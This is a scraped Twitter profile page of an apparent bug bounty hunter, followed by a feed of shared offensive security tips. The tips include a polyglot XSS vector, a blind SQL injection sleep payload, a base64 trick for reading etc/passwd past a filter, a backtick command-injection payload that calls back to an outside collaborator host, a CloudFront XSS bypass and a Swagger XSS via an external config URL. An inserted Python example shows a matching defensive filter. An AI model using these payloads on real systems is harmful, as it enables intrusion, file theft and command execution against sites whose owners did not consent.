Hero_of_Digital (@_mk_mustafa) 's Twitter Profile

27y & oil engineer & penetration tester & investment trading & still learning..I love sports & traveling and 🪂🏊✈️🤵☃️🌄🌍🎹.

🇮🇶

ID: 2915811492

01-12-2014 17:32:36

61 Tweet

145 Followers

58 Following

Md Ismail Šojal 🕷️ (@0x0sojalsec) 's Twitter Profile Photo

The best single #XSS vector you'll ever have! Payload : JavaScript://%250Aalert?.(1)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/</Style/</Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

N$ (@nav1n0x) 's Twitter Profile Photo

Blind #SQLInjection on #GraphQL

The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parameter "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks using my fav payload: "0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z", #BugBounty
Ali K. M (@mysanismine) 's Twitter Profile Photo

Long time no hacking

Last 24 hr was really good, I was able to find 3 bugs in 2 different programs with Hero_of_Digital.

All using Shodan.

#BugBounty #bugcrowd #hacker
Godfather Orwa 🇯🇴 (@godfatherorwa) 's Twitter Profile Photo

url/?f=etc/passwd ==> 403
encode etc/passwd as base64

url/?f=L2V0Yy9wYXNzd2Q= ==> 200

#note 
you can use this trick in SQL , SSTI , XSS , LFI , Etc...

#bugbountytips #bugbountytip
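
Added example, not part of the original post: a defensive sketch of why the encoded request in the tip above gets through a filter that inspects only the raw value, and how decoding each parameter before applying the rule closes the gap. The deny pattern and all function names are assumptions made for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed deny rule for illustration: sensitive path or directory traversal.
DENY = re.compile(r"(^|/)etc/passwd\b|\.\./")
# Shape check so only plausible base64 (standard or URL-safe) is decoded.
B64_RE = re.compile(r"^[A-Za-z0-9+/_-]{4,}={0,2}$")

def naive_blocked(value):
    """Filter that looks only at the raw parameter value (assumed behaviour)."""
    return bool(DENY.search(value))

def decodings(value, max_depth=3):
    """Return the value plus every URL- and base64-decoded form, layer by layer."""
    seen, frontier = {value}, [value]
    for _ in range(max_depth):
        found = []
        for v in frontier:
            candidates = [unquote(v)]
            if B64_RE.match(v):
                try:
                    std = v.replace("-", "+").replace("_", "/")
                    std += "=" * (-len(std) % 4)  # restore stripped padding
                    raw = base64.b64decode(std, validate=True)
                    candidates.append(raw.decode("utf-8"))
                except (binascii.Error, UnicodeDecodeError):
                    pass  # not really base64 text; keep only the other forms
            for c in candidates:
                if c not in seen:
                    seen.add(c)
                    found.append(c)
        frontier = found
    return seen

def normalized_blocked(value):
    """Apply the same deny rule to the raw value and to every decoded form."""
    return any(DENY.search(v) for v in decodings(value))
```

Normalising in the filter is defence in depth only; the handler that decodes the parameter should still resolve the resulting path against an allow-listed base directory.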
Jefferson Gonzales (@gonzxph) 's Twitter Profile Photo

My first time RCE

you can embed a link on your target program? try this one

Payload:
http://collaboratorlink(.)com?`whoami`

If you're lucky then you'll like this

#BugBounty #bugbountytips #RCE
Md Ismail Šojal 🕷️ (@0x0sojalsec) 's Twitter Profile Photo

CloudFront bypass:⚔️

">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>

Would be interested to know if this is target specific or other CloudFront websites are vulnerable

#infosec  #xss #cybersec #bugbountytips
ProjectDiscovery (@pdiscoveryio) 's Twitter Profile Photo

Use dnsx to bruteforce subdomains and filter the successful requests with httpx! 

⌨️ dnsx -d roots.txt -w <key,words> | httpx -sc -mc 200

🌀 Install dnsx 👉 github.com/projectdiscove…
🌀 Install httpx 👉 github.com/projectdiscove…

#hackwithautomation #security #bugbounty
bugcrowd (@bugcrowd) 's Twitter Profile Photo

🥁 4rsh4n andrewjlamarche anhchangmutrang ArkCSI bk273 booboo brahim_nah BrandonReynolds Chapuka dk4trin hacker_might Hero_of_Digital khammad93 Kullai116

Justin Gardner (@rhynorater) 's Twitter Profile Photo

I've made over 100k on SSRF vulnerabilities.

They aren't always as simple as pointing it at localhost or AWS Metadata service. 

Here are some tricks I've picked up over the past 5 years of web app testing:
Jayesh Madnani (@jayesh25_) 's Twitter Profile Photo

Quick Wins: If you come across an outdated Swagger instance, always remember to test for XSS vulnerabilities. Try these payloads and earn some quick bounties!

http://example(.)com/swagger-ui/index.html?configUrl=https://jumpy-floor.surge(.)sh/test.json
Jayesh Madnani (@jayesh25_) 's Twitter Profile Photo

🔍 Bug Bounty Tips: Crawling parameters with Katana for quick XSS/SQLI wins!

🚀 When it comes to efficient bug hunting, active crawling can be a game-changer. One of the tools I rely on is Katana, which helps retrieve URLs and parameters for thorough testing against XSS, SQLI,
RootMoksha Labs (@rootmoksha) 's Twitter Profile Photo

Search for all leaked keys/secrets using one regex!
regex: gist.github.com/h4x0r-dz/be69c…
Credits: H4x0r.DZ
#bugbountytips #BugBounty #bugbountytip #bugbounty
Brut 🇮🇳 (@wtf_brut) 's Twitter Profile Photo

🚨Scanning for SQL and XSS vulnerability🚨
📥Credits - Md Ismail Sojal

#infosec #cybersec #BugBounty #bugbountytip #bugbountytips #ethicalhacking #CyberSecurity #Pentesting #sqli #xss #CyberSecurityAwareness #bugbounty #ssrf #AEM #MAPT